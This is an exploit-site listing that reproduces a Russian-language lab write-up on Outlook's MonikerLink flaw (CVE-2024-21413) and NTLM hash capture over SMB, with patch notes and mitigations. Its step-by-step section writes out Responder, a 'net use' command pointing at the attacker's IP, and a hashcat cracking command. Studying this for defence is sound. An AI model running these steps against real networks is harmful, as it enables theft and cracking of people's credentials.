Sploitus

Exploit for lab-SMB-responder

kitploit · 2026-08-24

Exploit Code

MARKDOWN186 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-SALLOCINAVALCANTE-LAB-SMB-RESPONDER-CVE-2024-21413
# Лаборатория SMB + Responder (CVE-2024-21413)

## 🎯 Цель

Этот проект был направлен на изучение уязвимости **CVE-2024-21413** (_MonikerLink_), исследуя, как протокол **SMB/NTLM** может быть использован для перехвата учетных данных.  
Даже после официального исправления Microsoft лабораторная работа показывает, что концепция остается актуальной во внутренних сценариях.

* * *

## 📖 Теория эксплойта

Уязвимость (CVE-2024-21413), известная как MonikerLink, была классифицирована как критическая (CVSS 9.8). Это происходит потому, что Outlook небезопасно обрабатывал ссылки "file://", используя старые COM-API (объекты Moniker). Эти объекты позволяли Outlook вызывать внешние ресурсы, минуя Protected View, побуждая клиента автоматически инициировать SMB-соединения.

### 1\. Что такое Moniker Link?

Это функция Windows, позволяющая ссылаться на COM-объекты через специальные ссылки.

### 2\. Как Outlook обрабатывал file://

Оригинальный эксплойт злоупотреблял ссылками "file://" или UNC-путями, отправленными по электронной почте.

### 3\. Как происходил обход с помощью "!"

Добавляя символ "!" в ссылку, можно было обойти внутренние защиты Outlook, принудительно открывая внешний ресурс напрямую.

### 4\. Как NTLM раскрывался

Это приводило к автоматической аутентификации NTLM, раскрывая хэши NetNTLMv2 атакующему без значительного взаимодействия с пользователем.

### 5\. Что исправляет патч

Патч KB5002519 специально блокирует такое поведение в Outlook, предотвращая обработку ссылок "file://" таким образом.

### 6\. Что патч НЕ исправляет

Однако автоматический NTLM в Windows продолжает работать вне контекста Outlook, то есть любая попытка доступа к SMB-ресурсам в среде, где NTLM включен и нет ограничений аутентификации, все еще может привести к автоматической отправке хэшей.

* * *

📌 Связь между Outlook, SMB/NTLM и Responder Оригинальный эксплойт: через спам-письмо с вредоносной ссылкой → Outlook обрабатывал → NTLM аутентифицировал автоматически → атакующий получал хэш.

Внутренняя лаборатория: мы смоделировали только концептуальную часть → принудительно установили SMB-соединение → Responder захватил хэш → Hashcat выполнил взлом.

**Почему это все еще работает? Потому что NTLM — это устаревший протокол, который автоматически аутентифицируется при SMB-соединениях, независимо от Outlook. Патч исправляет клиент Outlook, но не устраняет поведение NTLM в Windows**

* * *

## 🏗️ Архитектура лаборатории

  * **Атакующий:** Kali Linux с Responder и Hashcat.
  * **Жертва:** Windows с установленным Outlook.
  * **Сеть:** симулированная локальная сеть, без внешнего доступа.
  * **Инструменты:**
    * Responder → для отравления протоколов и захвата хэшей.
    * Hashcat → для офлайн-взлома захваченных хэшей.



![IP win](https://assets.kitploit.com/production/public/readmes/20378/6fcdaa02c19cae9f142c14d29d655e2c70aa4b2a1f6fb47c7bc641aae8a69643.png)  
![IP a Linux](https://assets.kitploit.com/production/public/readmes/20378/88b1a5c56c3d3355096153b337e617093b65def23cbbf606443cab82b8357249.png)

* * *

## 🛡️ Патч Outlook

Во время тестов Outlook блокировал ссылки `file://`, приходящие по электронной почте, отображая предупреждение безопасности:

![Alerta Outlook](https://assets.kitploit.com/production/public/readmes/20378/7523b66218804b71ecf8641bc645cd80e372c71aa19e57c69a1322c0e0243ecb.png)

### Примечание

Патч KB5002519, выпущенный в феврале 2024 года, смягчает внешний вектор через электронную почту, блокируя ссылки `file://`.  
Однако протокол NTLM по-прежнему позволяет автоматическую аутентификацию при SMB-соединениях.  
Это означает, что хотя Outlook защищен от данного конкретного эксплойта, внутренняя поверхность атаки остается актуальной.  
Корень проблемы заключается в зависимости от NTLM как механизма аутентификации, который по-прежнему подвержен захвату хэшей при SMB-соединениях.

* * *

## 📊 Показатели риска

  * **CVE:** CVE-2024-21413
  * **CVSS:** 9.8 (Критический)
  * **Влияние:** RCE + утечка учетных данных
  * **Вектор:** Внешний (Outlook) и внутренний (SMB/NTLM)
  * **Рекомендуемое смягчение:**
    * Применить патч KB5002519.
    * Отключить NTLM там, где это возможно.
    * Принудительно использовать Kerberos в средах AD.
    * Внедрить MFA и надежные пароли.



* * *

## 📚 Выводы

  1. Патч Outlook блокирует только клики по внешним ссылкам.
  2. SMB/NTLM по-прежнему является поверхностью атаки внутри сети.
  3. Хэши NetNTLMv2 могут быть захвачены и взломаны офлайн.
  4. Слабые пароли легко находятся в стандартных словарях.
  5. Даже с официальным исправлением уязвимость сохраняет актуальность во внутренних сценариях.



* * *

## 📌 Пошаговая инструкция

  1. **Запуск Responder** Здесь мы запускаем Responder на сетевом интерфейсе Kali. Он действует как поддельный SMB-сервер, готовый отвечать на запросы жертвы и захватывать учетные данные NTLM. Этот шаг необходим для подготовки среды отравления протоколов и перехвата. Команда в Kali Linux:



root@kitploit:~
    
    
    sudo responder -I eth0
    

![Responder ativo](https://assets.kitploit.com/production/public/readmes/20378/b992d6fb76768466b92a05f5254d40918844fbade36e17e2b7ed83fc46c0e6a3.png)

* * *

  2. **Принуждение к SMB-соединению**  
В Windows мы вручную обращаемся к SMB-ресурсу, указывая IP атакующего. Этот доступ вынуждает клиент Windows попытаться автоматически аутентифицироваться через NTLM, отправляя хэш на поддельный сервер (Responder). Именно в этот момент происходит первоначальное раскрытие учетных данных. Мы можем принудительно установить SMB-соединение двумя способами:



Через Проводник, вручную перейдя по адресу:

root@kitploit:~
    
    
    \\<IP do atacante>\test.
    

## ![Forçando SMB no Explorer](https://assets.kitploit.com/production/public/readmes/20378/17137623e34bda55ee8b4d583572fe83cdca32107baf69aa2a9afff8e6219bd0.png)

Через терминал (cmd или PowerShell), используя команду:

root@kitploit:~
    
    
    net use \\<IP do atacante>\test
    

## ![Forçando SMB no terminal](https://assets.kitploit.com/production/public/readmes/20378/f5cc7032222a726a9c654d13573ee79e909e1220d9f55abae186d3919976b160.png)

  3. **Захват хэша**  
Responder перехватывает попытку аутентификации и сохраняет хэш NTLMv2 в файл журнала в /usr/share/responder/logs/. Этот файл содержит исходные данные, которые будут использованы для взлома. Здесь мы демонстрируем уязвимость: даже без пароля в открытом виде хэш может быть захвачен и использован повторно.



root@kitploit:~
    
    
    /usr/share/responder/logs/SMB-NTLMv2-SSP-<IP>.txt
    

![Hash capturado pelo Responder](https://assets.kitploit.com/production/public/readmes/20378/efb02825a584569a8fda5f05369e2182737c00fabb36ad36297810aaf0250e9c.png)

* * *

  4. **Взлом с помощью Hashcat**  
Перед запуском Hashcat мы копируем хэш из журнала в файл в нашей домашней директории (~/hash.txt). Это упрощает работу и гарантирует, что Hashcat имеет прямой доступ к содержимому. Затем запускаем Hashcat в режиме 5600 (NetNTLMv2) со словарем rockyou.txt. Этот процесс пытается взломать хэш офлайн, демонстрируя, как слабые пароли могут быть быстро обнаружены. Результат показывает, был ли найден пароль, что свидетельствует о реальном риске уязвимости.



root@kitploit:~
    
    
    hashcat -m 5600 -a 0 ~/hash.txt /usr/share/wordlists/rockyou.txt
    

Примечание:  
Реальный пароль не отображается по соображениям безопасности. Цель — продемонстрировать процесс и уязвимость.

## ![Comando Hashcat](https://assets.kitploit.com/production/public/readmes/20378/3e8809dde9ae14561427cece31aaa51d12af3255f79f3fd36d58b3f1084a950d.png) ![Resultado do cracking](https://assets.kitploit.com/production/public/readmes/20378/18ac854a78c55d6235918a26b77783e9244d421e3fa69273d1424a1e7d01587c.png)

## ✅ Заключение

Эта лабораторная работа показала, что:

  * Эксплойт через Outlook был заблокирован патчем.
  * Тем не менее, можно вручную захватывать и взламывать SMB-хэши.
  * Уязвимость по-прежнему актуальна как концепция, подчеркивая важность **внутреннего укрепления** , **надежных паролей** и **перехода на Kerberos/токен-аутентификацию**.